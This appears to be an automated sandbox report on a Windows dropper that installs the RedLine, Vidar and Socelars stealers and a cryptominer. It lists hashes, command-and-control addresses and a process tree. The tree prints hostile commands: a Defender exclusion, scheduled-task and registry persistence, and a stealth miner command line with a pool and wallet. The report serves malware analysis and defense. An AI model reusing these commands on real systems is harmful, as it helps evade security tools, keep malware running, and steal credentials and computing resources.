Resubmissions

19-09-2021 09:55

210919-lx4m7abhb4 10

19-09-2021 08:44

210919-kncbxabgh5 10

Analysis

  • max time kernel
    1805s
  • max time network
    1784s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    19-09-2021 09:55

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.3MB

  • MD5

    7b4b44cc869a8b0f51ace918cef015ca

  • SHA1

    7b59d8a253c17d658eddbb32fe139c969aee8962

  • SHA256

    f38f738f52674e3f4689cdb299e82d40a6446ccec24abd4cac244fe64cdc07ed

  • SHA512

    78ed354bec23b5c892a7c104630ae1ebf2dfe3fc8f3ee8156af1e3ab5fa572f829856213fe31772ba9496bdfaf8dd507c0c6d8b488a9bf94bc338c4bff5141b0

Malware Config

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

redline

Botnet

matthew14

C2

193.188.21.209:41939

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 24 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 44 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 29 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 15 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Drops file in Windows directory 27 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 25 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 51 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 4 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5032
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3032
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4756
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun06c75858d552.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4840
          • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06c75858d552.exe
            Sun06c75858d552.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3776
            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
              6⤵
              • Executes dropped EXE
              PID:5848
              • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                7⤵
                • Executes dropped EXE
                PID:3024
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                  8⤵
                    PID:6364
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                      9⤵
                      • Creates scheduled task(s)
                      PID:5604
                  • C:\Users\Admin\AppData\Roaming\services64.exe
                    "C:\Users\Admin\AppData\Roaming\services64.exe"
                    8⤵
                    • Suspicious use of SetThreadContext
                    PID:3344
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                      9⤵
                        PID:3304
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                          10⤵
                          • Creates scheduled task(s)
                          PID:7056
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                        9⤵
                          PID:1156
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                          9⤵
                            PID:5416
                      • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4652
                        • C:\ProgramData\1825486.exe
                          "C:\ProgramData\1825486.exe"
                          8⤵
                          • Executes dropped EXE
                          PID:3064
                        • C:\ProgramData\2593538.exe
                          "C:\ProgramData\2593538.exe"
                          8⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:6720
                        • C:\ProgramData\8768569.exe
                          "C:\ProgramData\8768569.exe"
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:7068
                          • C:\ProgramData\8768569.exe
                            "C:\ProgramData\8768569.exe"
                            9⤵
                              PID:5820
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 1068
                              9⤵
                              • Program crash
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              PID:6252
                          • C:\ProgramData\4964542.exe
                            "C:\ProgramData\4964542.exe"
                            8⤵
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:4132
                        • C:\Users\Admin\AppData\Local\Temp\2.exe
                          "C:\Users\Admin\AppData\Local\Temp\2.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4624
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 4624 -s 1728
                            8⤵
                            • Program crash
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            PID:6528
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 4624 -s 1728
                            8⤵
                            • Program crash
                            PID:6728
                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                          7⤵
                            PID:5944
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 608
                              8⤵
                              • Program crash
                              PID:2340
                          • C:\Users\Admin\AppData\Local\Temp\askinstall58.exe
                            "C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5184
                          • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe
                            "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:5880
                            • C:\Users\Admin\AppData\Local\Temp\tmpC4F_tmp.exe
                              "C:\Users\Admin\AppData\Local\Temp\tmpC4F_tmp.exe"
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:2128
                              • C:\Users\Admin\AppData\Local\Temp\tmpC4F_tmp.exe
                                C:\Users\Admin\AppData\Local\Temp\tmpC4F_tmp.exe
                                9⤵
                                • Checks processor information in registry
                                • Enumerates system info in registry
                                PID:6092
                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                            "C:\Users\Admin\AppData\Local\Temp\6.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:5664
                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                              8⤵
                                PID:1340
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\jk847.bat" "
                                  9⤵
                                    PID:6508
                                    • C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\Foxynew.exe
                                      Foxynew.exe
                                      10⤵
                                      • Suspicious use of SetThreadContext
                                      PID:1976
                                      • C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\Foxynew.exe
                                        Foxynew.exe
                                        11⤵
                                          PID:5004
                                          • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                            "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
                                            12⤵
                                            • Suspicious use of SetThreadContext
                                            PID:5492
                                            • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                              "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
                                              13⤵
                                                PID:7044
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
                                                  14⤵
                                                    PID:2856
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
                                                      15⤵
                                                        PID:5932
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F
                                                      14⤵
                                                      • Creates scheduled task(s)
                                                      PID:1616
                                            • C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\FoxyIDS2.exe
                                              FoxyIDS2.exe
                                              10⤵
                                                PID:1156
                                                • C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
                                                  11⤵
                                                    PID:5424
                                          • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5052
                                            • C:\Users\Admin\AppData\Local\Temp\is-EDKMO.tmp\setup_2.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-EDKMO.tmp\setup_2.tmp" /SL5="$1028A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5512
                                              • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                9⤵
                                                • Executes dropped EXE
                                                PID:6392
                                                • C:\Users\Admin\AppData\Local\Temp\is-4I911.tmp\setup_2.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-4I911.tmp\setup_2.tmp" /SL5="$602F0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                  10⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:496
                                          • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                            "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Checks processor information in registry
                                            • Enumerates system info in registry
                                            PID:5144
                                            • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                              "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                              8⤵
                                              • Executes dropped EXE
                                              PID:3936
                                          • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                            "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:6132
                                          • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                            "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:6352
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Sun060f31ba456a.exe
                                      4⤵
                                        PID:3036
                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun060f31ba456a.exe
                                          Sun060f31ba456a.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4108
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun060f31ba456a.exe
                                            C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun060f31ba456a.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5592
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun060f31ba456a.exe
                                            C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun060f31ba456a.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:6064
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun0624f62ed3cfc8.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:3220
                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun0624f62ed3cfc8.exe
                                          Sun0624f62ed3cfc8.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3224
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 1844
                                            6⤵
                                            • Program crash
                                            • Checks processor information in registry
                                            • Enumerates system info in registry
                                            PID:5256
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun06a0ec9fc7.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:5068
                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06a0ec9fc7.exe
                                          Sun06a0ec9fc7.exe
                                          5⤵
                                          • Executes dropped EXE
                                          PID:1304
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 260
                                            6⤵
                                            • Program crash
                                            PID:5144
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun06abb9b770e9b36c.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:4944
                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06abb9b770e9b36c.exe
                                          Sun06abb9b770e9b36c.exe
                                          5⤵
                                          • Executes dropped EXE
                                          PID:5012
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 332
                                            6⤵
                                            • Program crash
                                            • Checks processor information in registry
                                            • Enumerates system info in registry
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5744
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun06ee1e0a2c54.exe
                                        4⤵
                                          PID:1196
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06ee1e0a2c54.exe
                                            Sun06ee1e0a2c54.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:4728
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Sun061927332abbf6f4e.exe
                                          4⤵
                                            PID:3524
                                            • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun061927332abbf6f4e.exe
                                              Sun061927332abbf6f4e.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4536
                                              • C:\Users\Admin\AppData\Roaming\1224131.scr
                                                "C:\Users\Admin\AppData\Roaming\1224131.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5976
                                              • C:\Users\Admin\AppData\Roaming\2402267.scr
                                                "C:\Users\Admin\AppData\Roaming\2402267.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5224
                                              • C:\Users\Admin\AppData\Roaming\4801166.scr
                                                "C:\Users\Admin\AppData\Roaming\4801166.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:5740
                                                • C:\Users\Admin\AppData\Roaming\4801166.scr
                                                  "C:\Users\Admin\AppData\Roaming\4801166.scr"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4788
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1068
                                                  7⤵
                                                  • Program crash
                                                  PID:6408
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1068
                                                  7⤵
                                                  • Program crash
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  PID:6372
                                              • C:\Users\Admin\AppData\Roaming\3275056.scr
                                                "C:\Users\Admin\AppData\Roaming\3275056.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5696
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun06f1bd2971.exe
                                            4⤵
                                              PID:4532
                                              • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06f1bd2971.exe
                                                Sun06f1bd2971.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5056
                                                • C:\Users\Admin\AppData\Local\Temp\tmpD040_tmp.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\tmpD040_tmp.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:5836
                                                  • C:\Users\Admin\AppData\Local\Temp\tmpD040_tmp.exe
                                                    C:\Users\Admin\AppData\Local\Temp\tmpD040_tmp.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5532
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Sun061fcef41b576c18.exe /mixone
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:5092
                                              • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun061fcef41b576c18.exe
                                                Sun061fcef41b576c18.exe /mixone
                                                5⤵
                                                • Executes dropped EXE
                                                PID:3880
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 264
                                                  6⤵
                                                  • Program crash
                                                  PID:6092
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Sun06d6464ba08aa8a36.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4772
                                              • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06d6464ba08aa8a36.exe
                                                Sun06d6464ba08aa8a36.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:3912
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 244
                                                  6⤵
                                                  • Program crash
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5992
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Sun06d03e50f999fd357.exe
                                              4⤵
                                                PID:4528
                                                • C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06d03e50f999fd357.exe
                                                  Sun06d03e50f999fd357.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:5136
                                                  • C:\Users\Admin\AppData\Local\Temp\is-SMEVD.tmp\Sun06d03e50f999fd357.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-SMEVD.tmp\Sun06d03e50f999fd357.tmp" /SL5="$3017C,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSCB8B51F0\Sun06d03e50f999fd357.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:5376
                                                    • C:\Users\Admin\AppData\Local\Temp\is-QMTV7.tmp\Ze2ro.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\is-QMTV7.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                      7⤵
                                                      • Drops file in Drivers directory
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Drops file in Program Files directory
                                                      PID:5752
                                                      • C:\Program Files\Windows Mail\KWCACWSLYU\ultramediaburner.exe
                                                        "C:\Program Files\Windows Mail\KWCACWSLYU\ultramediaburner.exe" /VERYSILENT
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:6568
                                                        • C:\Users\Admin\AppData\Local\Temp\is-C4P2O.tmp\ultramediaburner.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-C4P2O.tmp\ultramediaburner.tmp" /SL5="$20344,281924,62464,C:\Program Files\Windows Mail\KWCACWSLYU\ultramediaburner.exe" /VERYSILENT
                                                          9⤵
                                                          • Drops file in Program Files directory
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:6000
                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                            10⤵
                                                              PID:3684
                                                        • C:\Users\Admin\AppData\Local\Temp\0e-2c7fe-557-685b3-916775f88b182\Lysimelery.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\0e-2c7fe-557-685b3-916775f88b182\Lysimelery.exe"
                                                          8⤵
                                                            PID:6988
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                              9⤵
                                                              • Adds Run key to start application
                                                              • Enumerates system info in registry
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:4392
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a0e46f8,0x7ffd3a0e4708,0x7ffd3a0e4718
                                                                10⤵
                                                                  PID:6760
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
                                                                  10⤵
                                                                    PID:4400
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
                                                                    10⤵
                                                                      PID:1788
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                                                                      10⤵
                                                                        PID:6100
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,10544199790387950101,3969297091349692372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                                                                        10⤵
                                                                          PID:6476
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
